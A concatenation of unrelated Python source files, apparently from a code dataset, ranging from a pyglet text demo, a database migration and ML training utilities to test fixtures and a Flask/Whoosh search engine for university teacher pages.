Different <font face="Helvetica,Arial" size=+2>fonts</font>, <em>styles</em>
and <font color=maroon>colours</font> are supported.
<p>This window has been made resizable; text will reflow to fit the new size.
'''
window = pyglet.window.Window(resizable=True)
location = pyglet.resource.FileLocation(os.path.dirname(__file__))
label = pyglet.text.HTMLLabel(html, location=location,
width=window.width,
multiline=True, anchor_y='center')
@window.event
def on_resize(width, height):
# Wrap text to the width of the window
label.width = window.width
# Keep text vertically centered in the window
label.y = window.height // 2
@window.event
def on_draw():
window.clear()
label.draw()
pyglet.gl.glClearColor(1, 1, 1, 1)
pyglet.app.run()
|
nilq/baby-python
|
python
|
"""Replace block with 'lock'
Revision ID: 8192b68b7bd0
Revises: 3176777cd2bb
Create Date: 2021-01-20 20:48:40.867104
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "8192b68b7bd0"
down_revision = "3176777cd2bb"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column("user", sa.Column("locked", sa.Boolean(), nullable=True))
op.drop_column("user", "blocked")
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"blocked",
mysql.TINYINT(display_width=1),
autoincrement=False,
nullable=True,
),
)
op.drop_column("user", "locked")
# ### end Alembic commands ###
|
nilq/baby-python
|
python
|
#TODO check whether dummy classifier also does this
def count_true_positive(two_column_data_set):
positive_count = 0
for data in two_column_data_set["class"]:
##Hate Speech is labelled 0 in this project
if data == 0:
positive_count += 1
return positive_count
def compute_precision(positive_count, two_column_data_set):
#positive count is false positives and rest of data set is true positive if all data is marked non hate speech
return (len(two_column_data_set["class"])-positive_count)/len(two_column_data_set["class"])
def compute_recall(positive_count, two_column_data_set):
#always one, because there's never a true negative, because hate speech is never labelled as such
return (len(two_column_data_set["class"])-positive_count)/(len(two_column_data_set["class"])-positive_count)
def compute_accuracy(positive_count, two_column_data_set):
return (len(two_column_data_set["class"])-positive_count) / len(two_column_data_set["class"])
def compute_f_one(precision, recall):
return 2*precision*recall/(precision+recall)
def print_metrics(positive_count, two_column_data_set):
print("Accuracy: ", compute_accuracy(positive_count, two_column_data_set),"\n",
"Precision: ", compute_precision(positive_count, two_column_data_set), "\n",
"Recall: ", compute_recall(positive_count, two_column_data_set),"\n",
"F1: ", compute_f_one(compute_precision(positive_count, two_column_data_set), compute_recall(positive_count, two_column_data_set)))
|
nilq/baby-python
|
python
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from src.data_schema.feature_names import FeatureNames
from src.data_preparation.input_data_schema import LasVegasGovtDataSchema
def plot_feature_stat(df, feature_xaxis, feature_yaxis, output_file):
##### construct list of mean, standard deviation, max values,###
# min values, used for graph datapoints #####
groups_df = df.groupby([feature_xaxis])
# mean_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].mean()
mean_df = groups_df.mean()
mean_list = mean_df[feature_yaxis]
feature_list = df.groupby([feature_xaxis])[feature_xaxis]
# sd_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].std()
sd_df = groups_df.std()
# df.groupby([feature_xaxis]).std()
sd_list = sd_df[feature_yaxis]
# min_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].min()
min_df = groups_df.min()
min_list = min_df[feature_yaxis]
# max_df = df.groupby(feature_xaxis, as_index=False)[feature_yaxis].max()
max_df = groups_df.max()
max_list = max_df[feature_yaxis]
#### plot the mean, standard deviation, max value, min value in graph #####
plt.errorbar(np.arange(len(feature_list)), mean_list.values, sd_list.values, fmt='ok', ecolor='blue', lw=3)
plt.errorbar(np.arange(len(feature_list)), mean_list.values,
[mean_list.values - min_list.values, max_list.values - mean_list.values],
fmt='.k', ecolor='gray', lw=1)
#### Round off the score to two decimal places to be displayed in the graph #####
for i in range(len(mean_list)):
mean_list[i] = round(mean_list[i],2)
for i in range(len(min_list)):
min_list[i] = round(min_list[i],2)
for i in range(len(max_list)):
max_list[i] = round(max_list[i],2)
#### annonate the values of datapoint labels in the graph ######
for xy in zip(np.arange(len(feature_list)), mean_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), min_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
for xy in zip(np.arange(len(feature_list)), max_list.values):
plt.annotate('(%s, %s)' % xy, xy=xy, textcoords='data')
#### display/save the label on x and y axis #####
plt.xlabel(feature_xaxis)
plt.ylabel(feature_yaxis)
# plt.show()
plt.savefig(output_file)
if __name__ == '__main__':
file = '../../resources/dataset/final_lasvegas_dataset.csv'
output_file = '../../resources/images/graphs/price.png'
df = pd.read_csv(file)
schema_obj = FeatureNames()
df = df[[schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE]]
plot_feature_stat(df, schema_obj.COL_RESTAURANTS_PRICE_RANGE2, schema_obj.COL_INSPECTION_SCORE, output_file)
|
nilq/baby-python
|
python
|
from .sqlalchemy_conftest import * # noqa
@pytest.fixture(scope="session", autouse=True)
def set_up_gcs_mock_tempdir(tmp_path_factory):
from .okta_mock import _Auth
from alchemy.shared import auth_backends
auth_backends.auth, auth_backends.__auth = _Auth(), auth_backends.auth
auth_backends.init_app, auth_backends.__init_app = (lambda app, auth: None), auth_backends.init_app
class ReverseMock:
def __init__(self):
self.bypass_original = None
def __enter__(self):
self.bypass_original = auth_backends.auth.bypass
auth_backends.auth.bypass = False
def __exit__(self, exc_type, exc_val, exc_tb):
auth_backends.auth.bypass = self.bypass_original
auth_backends.ReverseMock = ReverseMock
@pytest.fixture(scope="session", autouse=True)
def disable_cloud_logging():
import os
old_val = os.environ.get('USE_CLOUD_LOGGING', default=None)
os.environ['USE_CLOUD_LOGGING'] = '0'
yield
if old_val is None:
del os.environ['USE_CLOUD_LOGGING']
else:
os.environ['USE_CLOUD_LOGGING'] = old_val
|
nilq/baby-python
|
python
|
import argparse
from snakemake.shell import shell
from .slurm_job import SlurmJob
from exceRNApipeline.includes.utils import logger
def pre_process(input_fq, adapter, log_file, prefix):
cmd = f"""
hts_Stats -L {log_file} -U {input_fq} | \\
hts_AdapterTrimmer -A -L {log_file} -a {adapter} | \\
hts_QWindowTrim -n -A -L {log_file} | \\
hts_NTrimmer -n -A -L {log_file} | \\
hts_Stats -A -L {log_file} -f {prefix}
"""
logger(cmd)
shell(cmd)
def parse_args():
parser = argparse.ArgumentParser(
description="[exRNA-pipeline] pre-processing"
)
parser.add_argument("-i", "--input-fq", type=str,
help="Path to the input fastq files.")
parser.add_argument("-o", "--output-fq", type=str,
help="Path to t he output fastq files.")
parser.add_argument("-n", "--sample-name", type=str,
help="Sample name")
parser.add_argument("-a", "--adapter", type=str,
help="Adapter sequence.")
parser.add_argument("-l", "--log-file", type=str,
help="Path to the log file.")
parser.add_argument("-p", "--prefix", type=str,
help="Output prefix")
parser.add_argument("-s", "--scratch-dir", type=str,
help="Path to the scratch diractory.")
args = parser.parse_args()
if args.scratch_dir == "None":
args.scratch_dir = None
return args
def main():
args = parse_args()
if args.scratch_dir:
with SlurmJob(args.scratch_dir) as slurm:
pre_process(
args.input_fq, args.adapter,
f"{slurm.scratch}/{args.sample_name}.htsStats.log",
f"{slurm.scratch}/{args.sample_name}"
)
cmd = f"""
mv {slurm.scratch}/{args.sample_name}_SE.fastq.gz {args.output_fq}
mv {slurm.scratch}/{args.sample_name}.htsStats.log {args.log_file}
"""
logger(cmd)
shell(cmd)
else:
pre_process(args.input_fq, args.adapter,
args.log_file, args. prefix)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import pandas as pd
import csv
original_csv = pd.read_csv('./Fuzzy_dataset.csv')
normal_csv = open('./fuzzy_normal_dataset.csv', 'w', newline='', encoding='utf-8')
normal_csv_file = csv.writer(normal_csv)
abnormal_csv = open('./fuzzy_abnormal_dataset.csv', 'w', newline='', encoding='utf-8')
abnormal_csv_file = csv.writer(abnormal_csv)
idx = 0
normal_first = False
abnormal_first = False
while idx < len(original_csv) // 30:
original_row = original_csv.iloc[idx]
number_of_data = original_row[2]
is_regular = (original_row[number_of_data + 3] == 'R')
original_row.dropna(inplace=True)
if is_regular:
if not normal_first and number_of_data != 8:
idx += 1
continue
normal_first = True
normal_csv_file.writerow(original_row[1:])
else:
if not abnormal_first and number_of_data != 8:
idx += 1
continue
abnormal_first = True
abnormal_csv_file.writerow(original_row[1:])
idx += 1
if idx % 500000 == 0:
print(idx)
|
nilq/baby-python
|
python
|
# -*- coding: utf-8 -*-
"""
Created on Sun Nov 18 15:34:32 2018
@author: wangyu
"""
import socket
import sys
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) #与服务端相同
try:
sock.connect(('127.0.0.1',1052))
except socket.error as e:
print(e)
sys.exit(-1)
data_send = 'test'
sock.send(data_send.encode())
data_recv = sock.recv(98)
print('recieved len is %d the recv conent is %s'%(len(data_recv),data_recv.decode()))
sock.close()
|
nilq/baby-python
|
python
|
from .settings import *
from .user_groups import *
|
nilq/baby-python
|
python
|
import unittest
from unittest.mock import Mock, patch
from nuplan.common.actor_state.scene_object import SceneObject, SceneObjectMetadata
class TestSceneObject(unittest.TestCase):
"""Tests SceneObject class"""
@patch("nuplan.common.actor_state.tracked_objects_types.TrackedObjectType")
@patch("nuplan.common.actor_state.oriented_box.OrientedBox")
def test_initialization(self, mock_box: Mock, mock_tracked_object_type: Mock) -> None:
"""Tests that agents can be initialized correctly"""
scene_object = SceneObject(mock_tracked_object_type, mock_box, SceneObjectMetadata(1, "123", 1, "456"))
self.assertEqual("123", scene_object.token)
self.assertEqual("456", scene_object.track_token)
self.assertEqual(mock_box, scene_object.box)
self.assertEqual(mock_tracked_object_type, scene_object.tracked_object_type)
@patch("nuplan.common.actor_state.scene_object.StateSE2")
@patch("nuplan.common.actor_state.scene_object.OrientedBox")
@patch("nuplan.common.actor_state.scene_object.TrackedObjectType")
@patch("nuplan.common.actor_state.scene_object.SceneObject.__init__")
def test_construction(self, mock_init: Mock, mock_type: Mock, mock_box_object: Mock, mock_state: Mock) -> None:
"""Test that agents can be constructed correctly."""
mock_init.return_value = None
mock_box = Mock()
mock_box_object.return_value = mock_box
_ = SceneObject.from_raw_params("123", "123", 1, 1, mock_state, size=(3, 2, 1))
mock_box_object.assert_called_with(mock_state, width=3, length=2, height=1)
mock_init.assert_called_with(
metadata=SceneObjectMetadata(token="123", track_token="123", timestamp_us=1, track_id=1),
tracked_object_type=mock_type.GENERIC_OBJECT,
oriented_box=mock_box,
)
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
# @Title: 数组中重复的数字 (数组中重复的数字 LCOF)
# @Author: 18015528893
# @Date: 2021-02-28 16:44:53
# @Runtime: 52 ms
# @Memory: 23.4 MB
class Solution:
def findRepeatNumber(self, nums: List[int]) -> int:
for i in range(len(nums)):
while nums[i] != i:
if nums[nums[i]] == nums[i]:
return nums[i]
else:
nums[nums[i]], nums[i] = nums[i], nums[nums[i]]
return -1
|
nilq/baby-python
|
python
|
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "LICENSE.txt" file accompanying this file.
# This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied.
# See the License for the specific language governing permissions and limitations under the License.
import logging
import boto3
from assertpy import assert_that
from utils import get_root_volume_id
def convert_tags_dicts_to_tags_list(tags_dicts):
"""Convert dicts of the form {key: value} to a list like [{"Key": key, "Value": value}]."""
tags_list = []
for tags_dict in tags_dicts:
tags_list.extend([{"Key": key, "Value": value} for key, value in tags_dict.items()])
return tags_list
def get_cloudformation_tags(region, stack_name):
"""
Return the tags for the CFN stack with the given name
The returned values is a list like the following:
[
{'Key': 'Key2', 'Value': 'Value2'},
{'Key': 'Key1', 'Value': 'Value1'},
]
"""
cfn_client = boto3.client("cloudformation", region_name=region)
response = cfn_client.describe_stacks(StackName=stack_name)
return response["Stacks"][0]["Tags"]
def get_main_stack_tags(cluster):
"""Return the tags for the cluster's main CFN stack."""
return get_cloudformation_tags(cluster.region, cluster.cfn_name)
def get_ec2_instance_tags(instance_id, region):
"""Return a list of tags associated with the given EC2 instance."""
logging.info("Getting tags for instance %s", instance_id)
return (
boto3.client("ec2", region_name=region)
.describe_instances(InstanceIds=[instance_id])
.get("Reservations")[0]
.get("Instances")[0]
.get("Tags")
)
def get_tags_for_volume(volume_id, region):
"""Return the tags attached to the given EBS volume."""
logging.info("Getting tags for volume %s", volume_id)
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_head_node_root_volume_tags(cluster, os):
"""Return the given cluster's head node's root volume's tags."""
root_volume_id = get_root_volume_id(cluster.head_node_instance_id, cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_head_node_tags(cluster):
"""Return the given cluster's head node's tags."""
return get_ec2_instance_tags(cluster.head_node_instance_id, cluster.region)
def get_compute_node_root_volume_tags(cluster, os):
"""Return the given cluster's compute node's root volume's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
root_volume_id = get_root_volume_id(compute_nodes[0], cluster.region, os)
return get_tags_for_volume(root_volume_id, cluster.region)
def get_compute_node_tags(cluster):
"""Return the given cluster's compute node's tags."""
compute_nodes = cluster.get_cluster_instance_ids(node_type="Compute")
assert_that(compute_nodes).is_length(1)
return get_ec2_instance_tags(compute_nodes[0], cluster.region)
def get_ebs_volume_tags(volume_id, region):
"""Return the tags associated with the given EBS volume."""
return boto3.client("ec2", region_name=region).describe_volumes(VolumeIds=[volume_id]).get("Volumes")[0].get("Tags")
def get_shared_volume_tags(cluster):
"""Return the given cluster's EBS volume's tags."""
shared_volume = cluster.cfn_resources.get("EBS0")
return get_ebs_volume_tags(shared_volume, cluster.region)
|
nilq/baby-python
|
python
|
"""
Helper module allowing src modules to be imported into tests
"""
# pylint: disable=wrong-import-position
# pylint: disable=unused-import
import os
import sys
from blockutils.common import ensure_data_directories_exist
from blockutils.stac import STACQuery
# NOTE: this must be before the modis and gibs imports - else tests will not find path
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "..")))
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), "../src")))
from src.gibs import (
GibsAPI,
extract_query_dates,
make_list_layer_band,
move_dates_to_past,
)
from src.modis import Modis
|
nilq/baby-python
|
python
|
from .context import get_puzzle, get_solution_script
index = 7
INPUT = """
16,1,2,0,4,2,7,1,2,14
"""[1:-1].split("\n")
def test_d7p1():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p1 = script("d7p1")
assert d7p1 is not None, "d7p1 is none"
result = d7p1(INPUT)
assert result == 37, f"result is not 37: {result}"
def test_d7p2():
script = get_solution_script(index)
assert script is not None, "script is none"
d7p2 = script("d7p2")
assert d7p2 is not None, "d7p2 is none"
result = d7p2(INPUT)
assert result == 168, f"result is not 168: {result}"
|
nilq/baby-python
|
python
|
from collections import deque
def getIsWall(data):
favoriteNumber = int(data)
def isWall(x, y):
if y < 0 or x < 0:
return True
n = favoriteNumber + x * x + 3 * x + 2 * x * y + y + y * y
wall = 0
while n:
wall ^= n & 1
n >>= 1
return bool(wall)
return isWall
def search(isWall, goal):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen:
continue
seen.add(curr)
if curr == goal:
return steps
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
def searchMaxSteps(isWall, maxSteps):
seen = set()
queue = deque([((1, 1), 0)])
while queue:
curr, steps = queue.popleft()
if curr in seen or steps > maxSteps:
continue
seen.add(curr)
y, x = curr
for nxt in ((y - 1, x), (y + 1, x), (y, x - 1), (y, x + 1)):
if not isWall(*nxt):
queue.append((nxt, steps + 1))
return len(seen)
def part1(data):
return search(getIsWall(data), (31, 39))
def part2(data):
return searchMaxSteps(getIsWall(data), 50)
if __name__ == "__main__":
from aocd import get_data
data = get_data(year=2016, day=13)
print(part1(data))
print(part2(data))
|
nilq/baby-python
|
python
|
# coding: utf-8
import cv2, os, sys
from PIL import Image
import numpy as np
import os
from tensorflow import keras
from tensorflow.keras.layers import Input
from .Models import GoogLeNetModel
from .Models import VGG16Model
from .Models import InceptionV3Model
from .Models import MobileNetModel
from .Models import ResNet50Model
from . import const
from . import DA
from . import DA_setting
from main.log import get_logger
logger = get_logger(__name__)
class BaseNetwork(object):
def __init__(self, **params):
self.channel = params['channel'] if 'channel' in params else 3
self.classes = params['classes'] if 'classes' in params else 1
self.network = params['network']
self.input_size = params['input_size'] if 'input_size' in params else None
self.mean_image = params['mean_image'] if 'mean_image' in params else None
self.image_type = params['image_type'] if 'image_type' in params else None
self.xn = None
self.yn = None
self.val_xn = None
self.val_yn = None
self.pred_xn = None
self.pred_yn = None
def generate_train_data(self, train_list, da, batch_size):
# count = 0
while True:
for data in train_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "test_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.xn is None:
self.xn = da_im
self.yn = y
else:
self.xn = np.vstack((self.xn, da_im))
self.yn = np.vstack((self.yn, y))
if len(self.xn) == batch_size:
input_xn = self.xn
input_yn = self.yn
self.xn = None
self.yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_val_data(self, val_list, da, batch_size):
# count = 0
while True:
for data in val_list:
# count += 1
# get image(np.ndarray)
image = self._get_image_array(data[0],
resize=self.input_size,
dtype=np.uint8,
normalization=False)
# for galleria
y = data[1]
# Data augmentation
if len(data) < 3:
da_info = [[DA.NON_DA], [DA.NON_DA]]
else:
da_info = data[2]
da_im = da.get_image(image, da_info[0], da_info[1])
# test code
#savedir = ""
#savename = "val_{}.jpg".format(count)
#savepath = os.path.join(savedir,savename)
#save_arr = Image.fromarray(np.uint8(da_im))
#save_arr.save(savepath)
da_im = da_im[np.newaxis,:,:,:]
da_im = da_im.astype(np.float32)
da_im /= 255
if self.val_xn is None:
self.val_xn = da_im
self.val_yn = y
else:
self.val_xn = np.vstack((self.val_xn, da_im))
self.val_yn = np.vstack((self.val_yn, y))
if len(self.val_xn) == batch_size:
input_xn = self.val_xn
input_yn = self.val_yn
self.val_xn = None
self.val_yn = None
if self.network == const.GOOGLE_NET:
yield(input_xn,
{'loss1': input_yn,
'loss2': input_yn,
'loss3': input_yn})
else:
yield(input_xn, input_yn)
def generate_predict_data(self, test_list, batch_size):
while True:
for data in test_list:
image = self._get_image_array(data[0], #train_path,
resize=self.input_size,
dtype=np.uint8,
normalization=False)
image = image[np.newaxis,:,:,:]
image = image.astype(np.float32)
image /= 255
if self.pred_xn is None:
self.pred_xn = image
else:
self.pred_xn = np.vstack((self.pred_xn, image))
if len(self.pred_xn) == batch_size:
input_xn = self.pred_xn
self.pred_xn = None
yield(input_xn)
def _get_image_array(self, path, **params):
dtype = params['dtype'] if 'dtype' in params else np.float32
resize = params['resize'] if 'resize' in params else None
normalization = params['normalization'] if 'normalization' in params else False
if self.channel == 1:
#img = Image.open(path).convert('L')
img = Image.open(path).convert('RGB')
elif self.channel == 3:
img = Image.open(path).convert('RGB')
else:
img = Image.open(path).convert('RGB')
im_arr = np.asarray(img)
if resize is not None:
im_arr = cv2.resize(im_arr, tuple(resize), interpolation=cv2.INTER_CUBIC)
# 8bit image convert [w,h,1]
# 32 bit image keep [w,h,3]
if im_arr.ndim == 2:
im_arr = im_arr[:,:,np.newaxis]
# maybe RGBA type image protection
if im_arr.ndim == 4:
im_arr = im_arr[:,:,:3]
im_arr = im_arr.astype(dtype)
# use mean image
if self.mean_image is not None:
mean = Image.open(self.mean_image).convert('RGB')
mean_arr = np.asarray(mean)
im_arr -= mean_arr
if normalization == True:
im_arr /= 255
return im_arr
'''
def _resize_array(self, image):
if image.shape[0] != self.input_size[0] or image.shape[1] != self.input_size[1]:
if image.dtype == np.float32 or image.dtype == np.float64:
if K.image_dim_ordering() == 'th':
image = image[0,:,:]
else:
image = image[:,:,0]
im = Image.fromarray(image)
im = im.resize(self.input_size, resample=Image.BICUBIC)
image = np.asarray(im)
if K.image_dim_ordering() == 'th':
image = image[np.newaxis,:,:]
else:
image = image[:,:,np.newaxis]
return image
'''
class Network(BaseNetwork):
def __init__(self, **params):
super(Network,self).__init__(**params)
input_tensor = Input(shape=(self.input_size[0], self.input_size[1], self.channel))
# input_tensor = Input(shape=(self.input_size[0], self.input_size[1], 3))
self.model = None
logger.debug(self.network)
if self.network == const.GOOGLE_NET:
# self.model = InceptionV3Model(self.classes,input_tensor).model
# self.model = GoogLeNetModel(self.classes, None, self.channel, self.input_size).model
self.model = GoogLeNetModel(self.classes, None, 3, self.input_size).model
elif self.network == const.VGG16:
self.model = VGG16Model(self.classes,input_tensor).model
elif self.network == const.MOBILE_NET:
self.model = MobileNetModel(self.classes,input_tensor).model
elif self.network == const.RESNET50:
self.model = ResNet50Model(self.classes,input_tensor).model
# self.model.summary()
def train(self, train_data, val_data, **params):
epochs = params['epochs'] if 'epochs' in params else 1
callbacks = params['callbacks'] if 'callbacks' in params else None
batch = params['batch'] if 'batch' in params else 1
val_batch = params['val_batch'] if 'val_batch' in params else 1
da_params = params['data_augmentation'] if 'data_augmentation' in params else None
da= DA_setting.run(da_params)
da_instance = DA.DataAugmentation(da)
train_data = da_instance.create_data_list(train_data)
val_data = da_instance.create_data_list(val_data)
train_data_batch_num = len(train_data) // batch
if train_data_batch_num < 1:
logger.debug('train_data_batch_num < 1')
sys.exit(1)
if val_data is not None:
val_data_batch_num = len(val_data) // val_batch
logger.debug(val_data_batch_num)
if val_data_batch_num < 1:
logger.debug('val_data_batch_num < 1')
sys.exit(1)
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
validation_data=self.generate_val_data(val_data, da_instance, val_batch),
validation_steps=val_data_batch_num,
callbacks=callbacks,
verbose=1)
else:
self.model.fit(
self.generate_train_data(train_data, da_instance, batch),
steps_per_epoch=train_data_batch_num,
epochs=epochs,
callbacks=callbacks,
verbose=1)
def save(self, path):
self.model.save(path)
def predict(self, data_list, **params):
batch = params['batch'] if 'batch' in params else 1
return self.model.predict_generator(
self.generate_predict_data(data_list, batch),#, da_instance),
steps=len(data_list) // batch,
verbose=1)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
parser = ArgumentParser(description="Run the test suite.")
parser.add_argument(
"--failfast",
action="store_true",
default=False,
dest="failfast",
help="Stop the test suite after the first failed test.",
)
parser.add_argument(
"--no-coverage",
action="store_false",
default=True,
dest="coverage",
help="Do not run coverage.py while running the tests.",
)
parser.add_argument(
"--no-input",
action="store_false",
default=True,
dest="interactive",
help="If the tests require input, do not prompt the user for input.",
)
args = parser.parse_args()
if args.coverage:
try:
from coverage import coverage
cov = coverage(include="doac*")
cov.start()
except ImportError:
cov = None
else:
cov = None
from django.conf import settings
from tests import settings as test_settings
settings.configure(test_settings, debug=True)
from django.test.utils import get_runner
TestRunner = get_runner(settings)
runner = TestRunner(verbosity=1, interactive=args.interactive, failfast=args.failfast)
failures = runner.run_tests(["tests", ])
if cov:
cov.stop()
cov.html_report()
if failures:
sys.exit(bool(failures))
|
nilq/baby-python
|
python
|
import torch
def accuracy(pred, target):
pred = pred.float()
correct = 0
for i in range(target.size()[0]):
if (pred[i] == pred[i].max()).nonzero() == target[i]:
correct += 1
return correct / target.size()[0]
|
nilq/baby-python
|
python
|
# Function to sort an unsorted list (due to globbing) using a number
# occuring in the path.
# Author: Lukas Snoek [lukassnoek.github.io]
# Contact: lukassnoek@gmail.com
# License: 3 clause BSD
from __future__ import division, print_function, absolute_import
import os.path as op
def sort_numbered_list(stat_list):
""" Sorts a list containing numbers.
Sorts list with paths to statistic files (e.g. COPEs, VARCOPES),
which are often sorted wrong (due to single and double digits).
This function extracts the numbers from the stat files and sorts
the original list accordingly.
Parameters
----------
stat_list : list or str
list with absolute paths to files
Returns
-------
sorted_list : list of str
sorted stat_list
"""
num_list = []
for path in stat_list:
num = [str(s) for s in str(op.basename(path)) if s.isdigit()]
num_list.append(int(''.join(num)))
sorted_list = [x for y, x in sorted(zip(num_list, stat_list))]
return sorted_list
|
nilq/baby-python
|
python
|
##############################
# support query serve for front web system
# filename:query.py
# author: liwei
# StuID: 1711350
# date: 2019.12.1
##############################
#查询构建
from whoosh import highlight
from whoosh import qparser
from whoosh import index
from flask import Flask
from flask import request
from flask import jsonify,render_template,abort, redirect, url_for,session, escape,Markup
from flask_cors import *
import re
import logging
from numpy import std
from data import xy_dict
from data import get_html,get_teacher_info,pagerank
# from audio import *
app = Flask(__name__)
CORS(app,supports_credentials=True) # 解决跨域请求无响应问题
app.secret_key=b'\xfa\n\x08\xb9\x84I\xe5xRdE\xea\x9f\xba\xce\x81'
mysession =dict() # 自定义的session用来传输数据
url_dict,scores = pagerank(get_teacher_info()) # 获取pageranke计算结果,返回链接映射和排名得分
# 定义日志记录文件的配置
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
DATE_FORMAT = "%m/%d/%Y %H:%M:%S %p"
logging.basicConfig(filename='my.log', level=logging.DEBUG, format=LOG_FORMAT, datefmt=DATE_FORMAT)
ix = index.open_dir("index") #打开该目录一遍存储索引文件
# 网页快照路由
@app.route('/snapshots/<xueyuan>/<filename>',methods=["GET"])
def snapshots(xueyuan = None ,filename=None):
if filename!=None and xueyuan !=None:
return render_template('snapshots/'+xueyuan+'/'+filename)
# 主页路由
@app.route('/',methods=["GET"])
def index():
return render_template("index.html",query="")
# 结果展示页面路由
@app.route('/display/',methods=["GET","POST"])
def display_index():
return render_template("display.html",count="#",query="输入查询词")
# 结果展示get请求页面响应
@app.route('/display/<count>&<query>')
def display(count=None,query=None):
#print(query)
if 'data' in mysession.keys():
#print(mysession["data"])
return render_template("display.html",count=count,query=query,res=mysession['data'])
else:
return redirect('/display/')
# # 实现语音输入查询
# @app.route('/audio',methods=['GET','POST'])
# def audio_query():
# assert request.path == '/audio'
# # 通过语音识别API获取查询输入
# get_audio(in_path)
# # 测试代码
# filename = "./speechs/input.wav"
# signal = open(filename, "rb").read()
# rate = 16000
# token = get_token()
# msg = recognize(signal, rate, token)
# query_sentence = " "
# if "err_no" in dict(msg).keys():
# logging.warning("%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]))
# return "%d,没有获取有效语音输入!错误消息%s 错误代码%d" %( 404,msg["err_msg"],msg["err_no"]), 404
# else:
# query_sentence = msg['result']
# # 记录日志
# logging.info("Audio Query sentence: %s" % query_sentence)
# res = []
# with ix.searcher() as searcher:
# # 对输入的查询文本进行解析,如果存在按域查询的需求则区分按域查询,默认采用多属性查询模式
# # mark 表示是否需要高亮学院查询区域,默认情况下需要
# highlight_xy = True
# # 默认的多域查询
# query = qparser.MultifieldParser(["content", "title", "mtext", "xueyuan"], ix.schema)
# if query_sentence.endswith("$姓名$"):
# # 按名字查询
# query = qparser.SimpleParser("title", ix.schema)
# query_sentence = query_sentence.strip('$姓名$')
# elif query_sentence.endswith("$学院$"):
# # 按学院查询
# query = qparser.SimpleParser("xueyuan", ix.schema)
# query_sentence = query_sentence.strip('$学院$')
#
# elif query_sentence.endswith("$网页$"):
# # 按网页内容查询
# query = qparser.SimpleParser("content", ix.schema)
# query_sentence = query_sentence.strip('$网页$')
#
# # print(query_sentence)
# # 引入查询解析器插件
# query.add_plugin(qparser.WildcardPlugin)
#
# # query.remove_plugin_class(qparser.WildcardPlugin)
# query.add_plugin(qparser.PrefixPlugin())
# query.add_plugin(qparser.OperatorsPlugin)
# query.add_plugin(qparser.RegexPlugin)
# query.add_plugin(qparser.PhrasePlugin)
#
# # 解析得到查询器
# q = query.parse(query_sentence)
# logging.info("Query parse result: %s" % str(q))
# print(q)
# # 获取查询结果
# result = searcher.search(q, limit=20)
# # print(result)
# # 设置碎片的属性
# # Allow larger fragments
# my_cf = highlight.ContextFragmenter(maxchars=200, surround=30)
# hf = highlight.HtmlFormatter(tagname='em', classname='match', termclass='term')
#
# hi = highlight.Highlighter(fragmenter=my_cf, formatter=hf)
# for hit in result:
# print(hit["picpath"])
# print(hit["title"])
# print(escape(hi.highlight_hit(hit, "content")))
# if hit['picpath'] == '#':
# if highlight_xy:
# res.append({"title": hit['title'],
# "xueyuan": Markup(hi.highlight_hit(hit, "xueyuan")),
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
# "pagerank": scores[url_dict[hit["url"]]]
# })
# else:
# res.append({"title": hit['title'],
# "xueyuan": hit["xueyuan"],
# "url": hit["url"],
# 'shotpath': hit['shotpath'],
# "content": Markup(hi.highlight_hit(hit, "content")),
# "parenturl": hit["parenturl"],
# "picpath": '#',
